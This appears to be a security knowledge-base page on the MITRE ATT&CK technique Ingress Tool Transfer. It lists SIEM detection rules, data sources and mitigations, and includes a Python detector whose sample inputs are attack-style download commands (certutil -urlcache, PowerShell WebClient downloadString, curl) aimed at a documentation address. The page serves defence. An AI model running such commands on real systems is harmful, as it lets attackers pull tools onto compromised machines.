T1105: Ingress Tool Transfer

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).

On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.

Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows search-ms protocol handler, to deliver malicious files to victims through remote file searches invoked by User Execution (typically after interacting with Phishing lures).

Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system. In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.

Positive Technologies products that cover the technique

MaxPatrol SIEM knowledge base

pt_application_firewall: PT-CR-637: PTAF_Reflected_File_Download_Detected: PT AF detected a reflected file download (RFD) attack
mssql_database: PT-CR-408: MSSQL_Create_File_In_System: An attempt to create a file on a hard disk using a database
kaspersky: PT-CR-1837: Kaspersky_Install_Malicious_App: A suspicious application is installed from Kaspersky Security Center
kaspersky: PT-CR-1836: Subrule_Kaspersky_Run_Task_Install_App: A task is run and an application is installed from Kaspersky Security Center
kaspersky: PT-CR-1835: Subrule_Kaspersky_Create_Package_And_Task: An installation package and task are created in Kaspersky Security Center
remote_work: PT-CR-1913: File_Copy_Via_RemoteAccess_Tool: A suspicious file was created using a remote access tool
microsoft_mecm: PT-CR-1876: MECM_Distribute_Content: Transferring a package or application to a distribution point in MECM
mitre_attck_execution: PT-CR-1093: Subrule_Payload_Download_Via_WebClient: The MSDT_Remote_Code_Execution rule subrule detected a connection to remote storage and the download of a malicious file
mitre_attck_execution: PT-CR-1090: MSDT_Remote_Code_Execution: Vulnerability CVE-2022-34713 has been exploited in the msdt.exe service, and a malicious file is downloaded from an attacker host
mitre_attck_execution: PT-CR-602: Finger_AWL_Bypass: An attempt to bypass application-start restrictions by using finger.exe (a built-in Microsoft Windows utility that displays information about users on a specified remote computer that is running the finger service)
mitre_attck_initial_access: PT-CR-2301: Suspicious_File_Creation_From_Messenger_Or_Mail: A file with a suspicious extension was created on behalf of an instant messenger or email program, or malicious file activity was detected. This may indicate a phishing attack or malware being delivered to the user's computer.
mitre_attck_collection: PT-CR-1932: Copying_Files: Copying files and folders using the xcopy and robocopy utilities, the copy command, or the Copy-Item cmdlet
unix_mitre_attck_command_and_control: PT-CR-295: Unix_Droppers_By_Daemons: Running a utility to transfer files on behalf of a service account is detected
mitre_attck_command_and_control: PT-CR-608: Download_File_Through_Curl: A utility is started to download files
mitre_attck_command_and_control: PT-CR-219: Remote_File_Download_Via_Certutil: An attempt to load data from external resources using the built-in utility certutil. Certutil can be used to obtain information about a certificate authority and configure certificate services.
mitre_attck_command_and_control: PT-CR-609: Download_File_Through_Windows_Defender: An attempt to download a file with Windows Defender is detected
mitre_attck_command_and_control: PT-CR-1816: Windows_Desktopimgdownldr_Ingress_Tool_Transfer: The built-in desktopimgdownldr utility was run with parameters that can be used to deliver attack tools
mitre_attck_command_and_control: PT-CR-467: Suspicious_Connection: A network request made by executable files is detected
mitre_attck_command_and_control: PT-CR-845: Download_Via_Encoded_Powershell: A user downloaded a payload via an encoded PowerShell command
unix_mitre_attck_lateral_movement: PT-CR-1699: Unix_File_Download_Via_GTFOBINS: The file was created using a GTFOBins utility. GTFOBins are Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
mitre_attck_cred_access: PT-CR-600: Esentutil_Copy_File: The "esentutil" utility is started
mitre_attck_lateral_movement: PT-CR-225: Creation_Suspicious_File: Creation of a potentially malicious file is detected
mitre_attck_lateral_movement: PT-CR-224: Remote_Copying_Malicious_File: An attempt was detected to copy a potentially malicious file with one of the following extensions: hta, ps1, py, vbe, cs, csproj, proj, com, cmd, bat, vbs, js, xsl, sct
mitre_attck_lateral_movement: PT-CR-222: Downloading_Remote_File_Via_Lolbas: An attempt to upload files is detected
mitre_attck_lateral_movement: PT-CR-1373: Remote_Creation_Suspicious_File: Remote creation of a potentially malicious file is detected
mitre_attck_lateral_movement: PT-CR-1372: Remote_SSP_Dump: The use of a script from a modified Impacket toolkit is detected. This allows the lsass process memory to be dumped remotely.
hacking_tools: PT-CR-761: Subrule_Duplex_Powershell_Connect: A two-way connection using powershell.exe is detected
hacking_tools: PT-CR-584: Empire_Stager: A PS script with an Empire stager substring is run
hacking_tools: PT-CR-755: Cobalt_Strike_Stager: Possible startup of a Cobalt Strike stager
hacking_tools: PT-CR-351: Koadic_Bitsadmin_Stager: Possible use of the Koadic software with BITSAdmin is detected
hacking_tools: PT-CR-750: Cobalt_Strike_Powershell_Payload_Delivery: A user downloaded a payload using an encoded PowerShell command
hacking_tools: PT-CR-365: Koadic_WMIC_Stager: Possible use of the Koadic software via a WMI script is detected
hacking_tools: PT-CR-353: Koadic_MSHTA_Stager: Possible use of the Koadic software (the Koadic framework is designed for post-exploitation in Windows family operating systems), which runs a payload on the attacked host using a Microsoft Windows HTML Application, was detected
hacking_tools: PT-CR-361: Koadic_Rundll32_Stager: Possible use of the Koadic software with Rundll32 is detected
hacking_tools: PT-CR-748: Cobalt_Strike_Payload_Delivery_Check: Multiple attempts to verify payload delivery using Cobalt Strike software
hacking_tools: PT-CR-587: SilentTrinity_Stager: Possible execution of the SilentTrinity stager is detected
hacking_tools: PT-CR-357: Koadic_REGSVR32_Stager: Possible use of the Koadic software with Regsvr32 is detected

Detection

ID: DS0022
Data source and component: File: File Creation
Description: Monitor for file creation and files transferred into the network

ID: DS0029
Data source and component: Network Traffic: Network Traffic Content
Description: Monitor network traffic content for files and other potentially malicious content, especially data coming in from abnormal or unknown domains and IPs.

ID: DS0017
Data source and component: Command: Command Execution
Description: Monitor executed commands and arguments for suspicious activity associated with downloading external content.
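One way to apply this Command Execution guidance, as an added example that is not code from Positive Technologies or from the MaxPatrol rule base: a small Python classifier that runs over constructed process command lines and flags the download utilities this page names (certutil, finger, curl/wget, the PowerShell WebClient/Invoke-WebRequest pattern, and encoded PowerShell commands), extracting any URL for triage. The rule names, sample command lines and the 203.0.113.x addresses are assumptions made for this example.

```python
import re
# Detection rules for the download utilities named on this page; the rule names are
# assumptions for this example, not Positive Technologies' PT-CR rule names.
RULES = [
    ("powershell_webclient_download",
     re.compile(r"Net\.WebClient\)\s*\.\s*Download(String|File)|Invoke-WebRequest|\biwr\b", re.I)),
    ("powershell_encoded_command",
     re.compile(r"\bpowershell(\.exe)?\b.*?\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("certutil_remote_download", re.compile(r"\bcertutil(\.exe)?\b.*(-urlcache|https?://)", re.I)),
    ("finger_remote_query", re.compile(r"\bfinger(\.exe)?\s+\S*@\S+", re.I)),
    ("unix_download_utility", re.compile(r"\b(curl|wget)\b.*https?://", re.I)),
]
URL_RE = re.compile(r"https?://[^\s'\")]+")
# Constructed process-creation command lines (not real telemetry); 203.0.113.x is a
# documentation address range and the -enc argument is a placeholder, not a real script.
SAMPLE_CMDLINES = [
    r"certutil.exe -urlcache -split -f http://203.0.113.5/tool.exe C:\Users\Public\t.exe",
    "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).downloadString('http://203.0.113.5/a')",
    "powershell.exe -enc " + "A" * 40,
    "finger.exe user@203.0.113.5",
    "curl -o /tmp/agent http://203.0.113.5/agent",
    "certutil.exe -verify cert.cer",  # benign: certutil with no remote source
    "curl --version",                 # benign: curl with no URL
    "powershell.exe Get-Process",     # benign: no download primitive
]

def classify(cmdline):
    """Return the first rule name that matches the command line, or None."""
    for name, pattern in RULES:
        if pattern.search(cmdline):
            return name
    return None

def extract_urls(cmdline):
    """Collect remote sources from the command line so the analyst can pivot on them."""
    return sorted(set(URL_RE.findall(cmdline)))

def scan(cmdlines):
    """Return (index, rule, urls) for every command line that trips a rule."""
    hits = []
    for i, cmd in enumerate(cmdlines):
        rule = classify(cmd)
        if rule is not None:
            hits.append((i, rule, extract_urls(cmd)))
    return hits

if __name__ == "__main__":
    for idx, rule, urls in scan(SAMPLE_CMDLINES):
        print(f"[{rule}] #{idx}: {SAMPLE_CMDLINES[idx]!r} urls={urls}")
```

The three benign lines show the point of requiring a remote source or an encoded blob in the pattern rather than alerting on the utility name alone.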

ID: DS0029
Data source and component: Network Traffic: Network Traffic Flow
Description: Monitor network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

ID: DS0029
Data source and component: Network Traffic: Network Connection Creation
Description: Monitor for newly constructed network connections sent to or received from untrusted hosts, or that result in files being created on the system; these may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.

Mitigation

ID: M1031
Name: Network Intrusion Prevention
Description: Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.